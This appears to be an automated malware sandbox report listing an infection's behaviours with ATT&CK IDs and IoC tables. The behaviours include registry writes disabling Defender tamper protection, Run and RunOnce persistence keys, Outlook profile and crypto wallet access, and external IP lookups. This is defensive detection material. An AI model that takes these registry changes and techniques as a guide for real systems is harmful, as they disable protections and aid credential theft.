Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Features\TamperProtection = "0"	tz9517.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0"	v4630nF.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Features\TamperProtection = "0"	tz9517.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Features\TamperProtection = "0"	Crack.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Features\TamperProtection = "0"	bus6396.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0"	cor7640.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Features\TamperProtection = "0"	jr866572.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Features\TamperProtection = "0"	w43kj59.exe

Accesses 2FA software files, possible credential harvesting 2 TTPs
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081

Accesses Microsoft Outlook profiles 1 TTPs 48 IoCs

collection

Email Collection

T1114

Processes:

sshDesktop-type0.8.0.3.exebrg.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-1013461898-3711306144-4198452673-1000\SOFTWARE\Microsoft\Office\18.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	sshDesktop-type0.8.0.3.exe
Key queried	\REGISTRY\USER\S-1-5-21-1013461898-3711306144-4198452673-1000\SOFTWARE\Microsoft\Office\19.0\Outlook\Profiles\Outlook	sshDesktop-type0.8.0.3.exe
Key opened	\REGISTRY\USER\S-1-5-21-1013461898-3711306144-4198452673-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	sshDesktop-type0.8.0.3.exe
Key opened	\REGISTRY\USER\S-1-5-21-1013461898-3711306144-4198452673-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	brg.exe
Key opened	\REGISTRY\USER\S-1-5-21-1013461898-3711306144-4198452673-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	sshDesktop-type0.8.0.3.exe
Key queried	\REGISTRY\USER\S-1-5-21-1013461898-3711306144-4198452673-1000\SOFTWARE\Microsoft\Office\16.0\Outlook\Profiles\Outlook	sshDesktop-type0.8.0.3.exe
Key created	\REGISTRY\USER\S-1-5-21-1013461898-3711306144-4198452673-1000\SOFTWARE\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	sshDesktop-type0.8.0.3.exe
Key created	\REGISTRY\USER\S-1-5-21-1013461898-3711306144-4198452673-1000\SOFTWARE\Microsoft\Office\18.0\Outlook\Profiles\Outlook	sshDesktop-type0.8.0.3.exe
Key opened	\REGISTRY\USER\S-1-5-21-1013461898-3711306144-4198452673-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	brg.exe
Key opened	\REGISTRY\USER\S-1-5-21-1013461898-3711306144-4198452673-1000\Software\Microsoft\Office\19.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	sshDesktop-type0.8.0.3.exe
Key opened	\REGISTRY\USER\S-1-5-21-1013461898-3711306144-4198452673-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	brg.exe
Key queried	\REGISTRY\USER\S-1-5-21-1013461898-3711306144-4198452673-1000\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	sshDesktop-type0.8.0.3.exe
Key created	\REGISTRY\USER\S-1-5-21-1013461898-3711306144-4198452673-1000\SOFTWARE\Microsoft\Office\17.0\Outlook\Profiles\Outlook	sshDesktop-type0.8.0.3.exe
Key queried	\REGISTRY\USER\S-1-5-21-1013461898-3711306144-4198452673-1000\SOFTWARE\Microsoft\Office\17.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	sshDesktop-type0.8.0.3.exe
Key opened	\REGISTRY\USER\S-1-5-21-1013461898-3711306144-4198452673-1000\Software\Microsoft\Office\18.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	sshDesktop-type0.8.0.3.exe
Key queried	\REGISTRY\USER\S-1-5-21-1013461898-3711306144-4198452673-1000\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	sshDesktop-type0.8.0.3.exe
Key created	\REGISTRY\USER\S-1-5-21-1013461898-3711306144-4198452673-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	sshDesktop-type0.8.0.3.exe
Key queried	\REGISTRY\USER\S-1-5-21-1013461898-3711306144-4198452673-1000\SOFTWARE\Microsoft\Office\17.0\Outlook\Profiles\Outlook	sshDesktop-type0.8.0.3.exe
Key queried	\REGISTRY\USER\S-1-5-21-1013461898-3711306144-4198452673-1000\SOFTWARE\Microsoft\Office\18.0\Outlook\Profiles\Outlook	sshDesktop-type0.8.0.3.exe
Key queried	\REGISTRY\USER\S-1-5-21-1013461898-3711306144-4198452673-1000\SOFTWARE\Microsoft\Office\20.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	sshDesktop-type0.8.0.3.exe
Key opened	\REGISTRY\USER\S-1-5-21-1013461898-3711306144-4198452673-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	sshDesktop-type0.8.0.3.exe
Key created	\REGISTRY\USER\S-1-5-21-1013461898-3711306144-4198452673-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	sshDesktop-type0.8.0.3.exe
Key created	\REGISTRY\USER\S-1-5-21-1013461898-3711306144-4198452673-1000\SOFTWARE\Microsoft\Office\19.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	sshDesktop-type0.8.0.3.exe
Key opened	\REGISTRY\USER\S-1-5-21-1013461898-3711306144-4198452673-1000\Software\Microsoft\Office\20.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	sshDesktop-type0.8.0.3.exe
Key queried	\REGISTRY\USER\S-1-5-21-1013461898-3711306144-4198452673-1000\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	brg.exe
Key queried	\REGISTRY\USER\S-1-5-21-1013461898-3711306144-4198452673-1000\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook	sshDesktop-type0.8.0.3.exe
Key created	\REGISTRY\USER\S-1-5-21-1013461898-3711306144-4198452673-1000\SOFTWARE\Microsoft\Office\16.0\Outlook\Profiles\Outlook	sshDesktop-type0.8.0.3.exe
Key queried	\REGISTRY\USER\S-1-5-21-1013461898-3711306144-4198452673-1000\SOFTWARE\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	sshDesktop-type0.8.0.3.exe
Key created	\REGISTRY\USER\S-1-5-21-1013461898-3711306144-4198452673-1000\SOFTWARE\Microsoft\Office\20.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	sshDesktop-type0.8.0.3.exe
Key created	\REGISTRY\USER\S-1-5-21-1013461898-3711306144-4198452673-1000\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	sshDesktop-type0.8.0.3.exe
Key queried	\REGISTRY\USER\S-1-5-21-1013461898-3711306144-4198452673-1000\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	brg.exe
Key created	\REGISTRY\USER\S-1-5-21-1013461898-3711306144-4198452673-1000\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook	sshDesktop-type0.8.0.3.exe
Key created	\REGISTRY\USER\S-1-5-21-1013461898-3711306144-4198452673-1000\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	sshDesktop-type0.8.0.3.exe
Key created	\REGISTRY\USER\S-1-5-21-1013461898-3711306144-4198452673-1000\Software\Microsoft\Office\19.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	sshDesktop-type0.8.0.3.exe
Key created	\REGISTRY\USER\S-1-5-21-1013461898-3711306144-4198452673-1000\Software\Microsoft\Office\20.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	sshDesktop-type0.8.0.3.exe
Key queried	\REGISTRY\USER\S-1-5-21-1013461898-3711306144-4198452673-1000\SOFTWARE\Microsoft\Office\18.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	sshDesktop-type0.8.0.3.exe
Key queried	\REGISTRY\USER\S-1-5-21-1013461898-3711306144-4198452673-1000\SOFTWARE\Microsoft\Office\19.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	sshDesktop-type0.8.0.3.exe
Key queried	\REGISTRY\USER\S-1-5-21-1013461898-3711306144-4198452673-1000\SOFTWARE\Microsoft\Office\20.0\Outlook\Profiles\Outlook	sshDesktop-type0.8.0.3.exe
Key created	\REGISTRY\USER\S-1-5-21-1013461898-3711306144-4198452673-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	sshDesktop-type0.8.0.3.exe
Key opened	\REGISTRY\USER\S-1-5-21-1013461898-3711306144-4198452673-1000\Software\Microsoft\Office\17.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	sshDesktop-type0.8.0.3.exe
Key created	\REGISTRY\USER\S-1-5-21-1013461898-3711306144-4198452673-1000\Software\Microsoft\Office\17.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	sshDesktop-type0.8.0.3.exe
Key created	\REGISTRY\USER\S-1-5-21-1013461898-3711306144-4198452673-1000\SOFTWARE\Microsoft\Office\17.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	sshDesktop-type0.8.0.3.exe
Key created	\REGISTRY\USER\S-1-5-21-1013461898-3711306144-4198452673-1000\Software\Microsoft\Office\18.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	sshDesktop-type0.8.0.3.exe
Key queried	\REGISTRY\USER\S-1-5-21-1013461898-3711306144-4198452673-1000\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook	sshDesktop-type0.8.0.3.exe
Key queried	\REGISTRY\USER\S-1-5-21-1013461898-3711306144-4198452673-1000\SOFTWARE\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	brg.exe
Key created	\REGISTRY\USER\S-1-5-21-1013461898-3711306144-4198452673-1000\SOFTWARE\Microsoft\Office\19.0\Outlook\Profiles\Outlook	sshDesktop-type0.8.0.3.exe
Key created	\REGISTRY\USER\S-1-5-21-1013461898-3711306144-4198452673-1000\SOFTWARE\Microsoft\Office\20.0\Outlook\Profiles\Outlook	sshDesktop-type0.8.0.3.exe
Key created	\REGISTRY\USER\S-1-5-21-1013461898-3711306144-4198452673-1000\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook	sshDesktop-type0.8.0.3.exe

Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials in Files
T1081

Adds Run key to start application 2 TTPs 64 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

Processes:

zitV0071.exekino5694.exeWerFault.exeWerFault.exekino5694.exe76feee748612466fbd3f219b1adae8b4 (2)2.exe76feee748612466fbd3f219b1adae8b4 (2).exezap7751.exezitV0071.exekino5308.exezap9196.exege386417.exekino5694.exezap7751.exezap9710.exePING.EXEzap9196.exekino6747.exekino6747.exekino5308.exe76feee748612466fbd3f219b1adae8b4 (2).exekino6747.exe76feee748612466fbd3f219b1adae8b4 (2)2.exezap9196.exe76feee748612466fbd3f219b1adae8b4 (2).exeInstallUtil.exechrome.exeWerFault.exezap9710.exestpoeoeiej.exeWerFault.exe76feee748612466fbd3f219b1adae8b4 (4).execmd.exezap9710.exe76feee748612466fbd3f219b1adae8b4 (4).exezap7751.exe

description	ioc	process
Key created	\REGISTRY\MACHINE\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce	zitV0071.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup5 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP005.TMP\\\""	zitV0071.exe
Key created	\REGISTRY\MACHINE\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce	kino5694.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup10 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP010.TMP\\\""	WerFault.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup11 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP011.TMP\\\""	WerFault.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup3 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP003.TMP\\\""	kino5694.exe
Key created	\REGISTRY\MACHINE\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce	kino5694.exe
Key created	\REGISTRY\MACHINE\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce	76feee748612466fbd3f219b1adae8b4 (2)2.exe
Key created	\REGISTRY\MACHINE\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce	WerFault.exe
Key created	\REGISTRY\MACHINE\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce	76feee748612466fbd3f219b1adae8b4 (2).exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup1 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP002.TMP\\\""	zap7751.exe
Key created	\REGISTRY\MACHINE\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce	zitV0071.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup13 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP013.TMP\\\""	kino5308.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup2 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP002.TMP\\\""	zap9196.exe
Key created	\REGISTRY\MACHINE\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce	ge386417.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup7 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP008.TMP\\\""	zitV0071.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup14 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP014.TMP\\\""	kino5694.exe
Key created	\REGISTRY\MACHINE\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce	zap7751.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup13 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP013.TMP\\\""	ge386417.exe
Key created	\REGISTRY\MACHINE\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce	zap9710.exe
Key created	\REGISTRY\MACHINE\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce	PING.EXE
Key created	\REGISTRY\MACHINE\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce	zap9196.exe
Key created	\REGISTRY\MACHINE\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce	kino6747.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup1 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP001.TMP\\\""	kino6747.exe
Key created	\REGISTRY\MACHINE\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce	kino5308.exe
Key created	\REGISTRY\MACHINE\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce	76feee748612466fbd3f219b1adae8b4 (2).exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup2 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP002.TMP\\\""	kino5308.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup7 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP007.TMP\\\""	kino6747.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup9 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP009.TMP\\\""	kino5694.exe
Key created	\REGISTRY\MACHINE\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce	76feee748612466fbd3f219b1adae8b4 (2)2.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup12 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP012.TMP\\\""	76feee748612466fbd3f219b1adae8b4 (2)2.exe
Key created	\REGISTRY\MACHINE\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce	zap9196.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup2 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP004.TMP\\\""	zap9196.exe
Key created	\REGISTRY\MACHINE\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce	76feee748612466fbd3f219b1adae8b4 (2).exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup6 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP006.TMP\\\""	InstallUtil.exe
Key created	\REGISTRY\USER\S-1-5-21-1013461898-3711306144-4198452673-1000\Software\Microsoft\Windows\CurrentVersion\Run	chrome.exe
Key created	\REGISTRY\MACHINE\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce	kino6747.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup4 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP004.TMP\\\""	76feee748612466fbd3f219b1adae8b4 (2).exe
Key created	\REGISTRY\MACHINE\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce	WerFault.exe
Key created	\REGISTRY\MACHINE\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce	zap9710.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup7 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP007.TMP\\\""	zap9710.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\""	76feee748612466fbd3f219b1adae8b4 (2).exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1013461898-3711306144-4198452673-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\SysHelper = "\"C:\\Users\\Admin\\AppData\\Local\\077c96e4-08ae-44b6-a3bc-f8b6583a336c\\stpoeoeiej.exe\" --AutoStart"	stpoeoeiej.exe
Key created	\REGISTRY\MACHINE\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce	kino6747.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup4 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP004.TMP\\\""	76feee748612466fbd3f219b1adae8b4 (2)2.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup3 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP003.TMP\\\""	WerFault.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup9 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP009.TMP\\\""	WerFault.exe
Key created	\REGISTRY\MACHINE\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce	kino5308.exe
Key created	\REGISTRY\MACHINE\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce	kino5694.exe
Key created	\REGISTRY\MACHINE\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce	76feee748612466fbd3f219b1adae8b4 (4).exe
Key created	\REGISTRY\MACHINE\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce	zap9196.exe
Key created	\REGISTRY\MACHINE\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce	cmd.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP001.TMP\\\""	76feee748612466fbd3f219b1adae8b4 (2).exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup11 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\""	kino6747.exe
Key created	\REGISTRY\MACHINE\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce	zap9710.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup4 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP005.TMP\\\""	zap9710.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup5 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP007.TMP\\\""	PING.EXE
Key created	\REGISTRY\MACHINE\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce	76feee748612466fbd3f219b1adae8b4 (4).exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup6 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP006.TMP\\\""	zap9196.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup8 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP011.TMP\\\""	76feee748612466fbd3f219b1adae8b4 (4).exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup5 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP005.TMP\\\""	zap7751.exe
Key created	\REGISTRY\MACHINE\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce	zap7751.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\""	76feee748612466fbd3f219b1adae8b4 (4).exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup1 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP001.TMP\\\""	zap7751.exe

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012

Checks whether UAC is enabled 1 TTPs 2 IoCs

evasion trojan

System Information Discovery

Processes:

legenda.exesshDesktop-type0.8.0.3.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	legenda.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	sshDesktop-type0.8.0.3.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs

Web Service
T1102

Looks up external IP address via web service 11 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

Processes:

flow	ioc
1353	api.2ip.ua
1408	api.2ip.ua
624	api.ipify.org
832	api.2ip.ua
833	api.2ip.ua
1248	api.2ip.ua
1249	api.2ip.ua
1354	api.2ip.ua
623	api.ipify.org
853	api.2ip.ua
1006	ip-api.com

Maps connected drives based on registry 3 TTPs 6 IoCs

Disk information is often read in order to detect sandboxing environments.

Query Registry

Peripheral Device Discovery

T1120

System Information Discovery

Processes:

msedge.execacls.exedsq85s03.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum	msedge.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\disk\Enum\0	msedge.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum	cacls.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\disk\Enum\0	cacls.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum	dsq85s03.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\disk\Enum\0	dsq85s03.exe

Suspicious use of NtSetInformationThreadHideFromDebugger 26 IoCs

Processes:

